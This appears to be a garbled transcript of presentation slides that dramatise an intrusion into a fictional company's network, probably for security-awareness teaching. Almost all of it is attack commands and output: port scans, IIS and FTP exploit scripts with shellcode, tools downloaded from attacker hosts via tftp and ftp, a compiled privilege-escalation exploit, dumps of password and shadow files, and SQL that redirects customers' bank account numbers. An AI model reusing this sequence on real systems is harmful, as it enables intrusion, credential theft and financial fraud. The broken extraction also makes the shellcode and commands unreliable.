Title: hacker'com:$
1(No Transcript)
2(No Transcript)
3hacker.com
nslookup
Default Server ns.hacker.com
Address 3.1.33.7
gt
www.billionaireshow.com
Non-authoritative answer
Name www.billionaireshow.com
Address 172.16.16.5
gt
exit
hacker.com
nmap -sS 172.16.16.5
Starting nmap V. 2.53 by fyodor_at_insecure.org (
www.insecure.org/nmap/ )
Interesting ports on www.billionaireshow.com
(172.16.16.5)
(The 1514 ports scanned but not shown below are
in state closed)
Port State Service 80/tcp open
http 135/tcp open loc-srv 139/tcp
open netbios-ssn 445/tcp open
microsoft-ds 1080/tcp open socks 8080/tcp
open http-proxy
Nmap run completed -- 1 IP address (1 host up)
scanned in 4 seconds
hacker.com
telnet 172.16.16.5 80
Trying 172.16.16.5... Connected to
172.16.16.5. Escape character is ''.
4(No Transcript)
5HEAD / HTTP/1.0
HTTP/1.1 200 OK Content-Length 2506 Date Mon,
01 Oct 2001 150441 GMT Content-Location
http//172.16.16.5/postinfo.html Content-Type
text/html Server Microsoft-IIS/5.0 Accept-Ranges
bytes Last-Modified Mon, 01 Oct 2001 110652
GMT ETag "20c1bf347cfc01941" Connection closed
by foreign host.
./idaexploit.sh 172.16.16.5
hacker.com
Connecting . . . Dumping Shell
\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\x
b1\x 1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x
66\xb9\x95\x04\x90\x90\x90\xac\ x34\x99\xaa\xe2\x
fa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99
\x14\x2c \x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99
\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4 \xf3\x99\x14\
x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xc
f\x14\x2c\x6 8\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd
9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x 99\x99\x1
4\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\
x14\x2c\xb4\xbf\ xd9\x99\x34\xc9\x66\x0c\xca\xbc\
xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66
6\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x
99\x99\x99\x99\x99\x99\x9 9\x99\x99\x99\x99\x99\x
99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x 99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\ x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x
99\x99 \x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x
99\x99\x99\x99\x89\x99\x99\x99\x9 9\x99\x99\x99\x
99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90
\x90\x90\x 90\x90\x90\x90\x90
Done...
Completing...
... GET /test.ida?perl -e 'print
"N"x230'u0101u00b5u0101u00b5u0101u00b5u01
01u00b53Dx HTTP/1.0 ... GET /test.ida?perl -e
'print "N"x230'u0abfu00b6u0abfu00b6u0abfu00
b6u0abfu00b63Dx HTTP/1.0 ...
yahoo perl -e 'print "\x90"x11800'SHELLCODE20
ini.TINY Binding cmd.exe PORT 80...
Finished...ENJOY!
C\WINNT\system32gt
C\WINNT\system32gt
cd ..
C\WINNTgt
dir
Volume in drive C has no label. Volume Serial
Number is 6446-0F57
7(No Transcript)
8Directory of C\WINNT
08/24/2001 0723p 36
vb.ini 08/24/2001 0723p 37
vbaddin.ini 12/06/1999 0500p
20,240 vmmreg32.dll 12/06/1999 0500p
366,864 welcome.exe 12/06/1999 0500p
23 welcome.ini 09/07/2001 0200p
348 win.ini 12/06/1999 0500p
256,192 winhelp.exe 07/21/2000 1205p
269,584 winhlp32.exe 07/21/2000 1205p
193,296 winrep.exe 09/28/2001 0441p
288,880 WMSysPrx.prx 12/06/1999 0500p
9,522 Zapotec.bmp 12/06/1999
0500p 707 _default.pif
70 File(s) 3,934,990 bytes 29 Dir(s)
7,330,738,176 bytes free
C\WINNT\system32gt
C\WINNT\system32gt
tftp.exe -i hackerbox.com GET nmap.exe
c\temp\nmap.exe
C\WINNT\system32gt
cd \temp
C\tempgt
nmap sP 172.16.16.1-255
Starting nmap V. 2.53 by fyodor_at_insecure.org (
www.insecure.org/nmap/)Host www.billionaireshow.c
om (172.16.16.5) appears to be up.Host
itguy.billionaireshow.com (172.16.16.176) appears
to be up. Nmap run completed -- 255 IP addresses
(2 host(s) up) scanned in 7 second
C\tempgt
9(No Transcript)
10C\tempgt
nmap O 172.16.16.176
Starting nmap V. 2.53 by fyodor_at_insecure.org (
www.insecure.org/nmap/ ) Interesting ports on
itguy.billionaireshow.com (172.16.16.176) (The
1514 ports scanned but not shown below are in
state closed)
21 /tcp open ftpd 22/tcp open
ssh
4045/tcp open lockd
6112/tcp open dtspc
TCP Sequence Prediction Classrandom
positive increments
Difficulty33565 (Worthy challenge) Remote OS
guesses Solaris 8 Nmap run completed -- 1 IP
address (1 host up) scanned in 4 seconds
C\tempgt
ftp 172.16.16.176
Connected to 172.16.16.176. 220
itguy.billionaireshow.com FTP server ready.
Name (172.16.16.176hacker)
C
C\tempgt
perl glob.pl 172.16.16.176 anonymous glob_at_glob.com
RET 0xbfbfeae8 Align 1 RET 0x805baf8 Align
1 RET 0x805e23a Align 1 220 itguy.billionairesho
w.com FTP server (Version 6.00LS) ready. Logged
in as anonymous/glob_at_glob.com. Sending evil STAT
command.
11Exploit Starting...\x31\xc0\x99\x52\x52\xb0\x17\
xcd\x80\x68\xcc\x73\x68\xcc\x68 \xcc\x62\x69\x6e\x
b3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04 \x88\x5
4\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\
x01 \x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\x
c3\x55\x89\xe5 \x83\xec\x08\xeb\x12\xa1\x3c\x50\x9
0 Exploit finished.. ENJOY!
whoami
root
12Solaris 8
13Exploit Starting...\x31\xc0\x99\x52\x52\xb0\x17\
xcd\x80\x68\xcc\x73\x68\xcc\x68 \xcc\x62\x69\x6e\x
b3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04 \x88\x5
4\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\
x01 \x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\x
c3\x55\x89\xe5 \x83\xec\x08\xeb\x12\xa1\x3c\x50\x9
0 Exploit finished.. ENJOY!
whoami
root
nslookup
Default Server billionaireshow.com
Address 172.16.15.2
gt
ls billionaireshow.com
billionaireshow.com
billionaireshow.com. NS
server ns.billionaireshow.com
billionaireshow.com. NS
server game.ec.billionaireshow.com
billiondollar
MX server mail.billionaireshow.com
ap.billionaireshow.com A
172.16.7.14
game.ec.billionaireshow.com A
172.16.7.22
gt
exit
14Solaris 8
15Exploit Starting...\x31\xc0\x99\x52\x52\xb0\x17\
xcd\x80\x68\xcc\x73\x68\xcc\x68 \xcc\x62\x69\x6e\x
b3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04 \x88\x5
4\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\
x01 \x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\x
c3\x55\x89\xe5 \x83\xec\x08\xeb\x12\xa1\x3c\x50\x9
0 Exploit finished.. ENJOY!
whoami
root
nslookup
Default Server billionaireshow.com
Address 172.16.15.2
gt
ls billionaireshow.com
billionaireshow.com
billionaireshow.com. NS
server ns.billionaireshow.com
billionaireshow.com. NS
server game.ec.billionaireshow.com
billiondollar
MX server mail.billionaireshow.com
ap.billionaireshow.com A
172.16.7.14
game.ec.billionaireshow.com A
172.16.7.22
gt
exit
telnet 172.16.6.14 22
Trying 172.16.16.14... Connected to
172.16.16.14. Escape character is ''.
SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)
16Connection closed by foreign host.
ssh l lp ap.billionaireshow.com
lps password
Authentication successful. Last login Sun Mar 28
2001 164305 -0500 from 209.134.176.54
lp_at_AP /home
lp_at_AP /home
uname -a
SunOS ap 5.8 Generic_105181-23 sun4u sparc
SUNW,UltraSPARC-IIi-Engine
lp_at_AP /home
17Solaris 8
SunOS 5.8
18Connection closed by foreign host.
ssh l lp ap.billionaireshow.com
lps password
Authentication successful. Last login Sun Mar 28
2001 164305 -0500 from 209.134.176.54
lp_at_AP /home
lp_at_AP /home
uname -a
SunOS ap 5.8 Generic_105181-23 sun4u sparc
SUNW,UltraSPARC-IIi-Engine
cd /
lp_at_AP /home
lp_at_AP /
ls
bam etc lostfound root tmp bin home mnt usr boot
opt proc sbin dev lib var vakkk oracle9 idxs
lp_at_AP /home
cd /tmp
lp_at_AP /tmp
ftp hackertoolz.com
Connected to hackertoolz.com. 220 SMACK FTP
server (Version 5.6(1) Tue Jun 27 105228 PDT
2000) ready.
anonymous
Name (hackertoolz.comlp)
331 Guest login ok, send your complete e-mail
address as password.
Password
230 Guest login ok, access restrictions apply.
ftpgt
get dtprintinfoBO.c
19200 PORT command successful.
150 ASCII data connection for chghost
(hackertoolz.com,32793) (1511 bytes). 226 ASCII
Transfer complete.
200 PORT command successful.
150 ASCII data connection for chghost
(hackertoolz.com,32793) (1511 bytes). 226 ASCII
Transfer complete.
local dtprintinfoBO.c remote dtprintinfoBO.c 155
8 bytes received in 0.014 seconds (107.57
Kbytes/s)
ftpgt
bye
221 Goodbye.
lp_at_ap /tmp
gcc o sploit dtprintinfoBO.c
lp_at_ap /tmp
./sploit
HACKBOX...admintool Overflow Exploits. creating...
ADJUST12.......done creating...ADJUST21..
.....done creating...BUFSIZE11000.......do
ne creating...BUFSIZE2800.......done
creating...OFFSET3600.......done
creating...OFFSET2400....done Sending
Shell....... \x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\
x0b\xda\xdc\xae\x15\xe3\x68 \x90\x0b\x80\x0e\x92\x
03\xa0\x0c\x94\x10\x20\x10\x94\x22\xa0\x10 \x9c\x0
3\xa0\x14\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\
xbf\xf8\xc0 \x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x
20\x08\x90\x1b\xc0\x0f\x82 \x10\x20\x01\x91\xd0\x2
0\x08 ....done
20ENJOY YOUR NEW BOX!
whoami
root
cat /etc/passwd
rootx00root/root/bin/bash binx11bin/bin
daemonx22daemon/sbin admx34adm/var/ad
m lpx47lp/var/spool/lpd/bin/bash syncx50
sync/sbin/bin/sync shutdownx60shutdown/sbi
n/sbin/shutdown haltx70halt/sbin/sbin/halt
mailx812mail/var/spool/mail
head /etc/shadow
rooth1QbJ57QWWmVY111770 bin1103809999
97 daemon110380999997 adm1103809
99997 lp110380999997 sync1103809
99997 shutdown110380999997 halt110
380999997 mail110380999997
21sqlplus
SQLgt
describe accounts
Name Null? Type ------------------ --------
----------- LNAME NOT NULL VARCHAR2(20)FNAME NO
T NULL VARCHAR2(15)ADDR1 NOT NULL VARCHAR2(30)A
DDR2 NOT NULL VARCHAR2(30)ZIP NOT
NULL NUMBER(5)PHONE NOT NULL CHAR(12)SSN NOT
NULL NUMBER(9)BANK NOT NULL VARCHAR2(30)ROUTING
_NUM NOT NULL NUMBER(9)ACCOUNT_NUM NOT
NULL NUMBER(12)
select ACCOUNT_NUM, ROUTING_NUM from accounts
SQLgt
ACCOUNT_NUM ROUTING_NUM ----------- ----------- 88
11101011 0601010158822822281 0601929114922929481
0698822115594492295 0695922156839186571 0627985
813985792816 061873710
220985949922 3209845812092028481 20409828560967809
14 098029820 4098320921 4509820916098509449 0950
982094090921109 6098303296987329810 908848828 4
987298731 9845984725098222091 095509860098303931
1 098098571
update accounts set ACCOUNT_NUM 0069858915
where LNAME ''
SQLgt
SQLgt
update accounts set ROUTING_NUM 6695922941
where LNAME ''
SQLgt
select LNAME, ACCOUNT_NUM, ROUTING_NUM from
accounts where LNAME ''
LNAME ACCOUNT_NUM ROUTING_NUM ----- -----------
----------- Young 0069858915 6695922941 Varick
0069858915 6695922941 Brantley 0069858915 6695922
941 Weinstein 0069858915 6695922941Davis 006985
8915 6695922941Reynard 0069858915 6695922941Hal
pert 0069858915 6695922941Davis 0069858915 6695
922941Kennedy 0069858915 6695922941Scott 00698
58915 6695922941Michaels 0069858915 6695922941N
oojin 0069858915 6695922941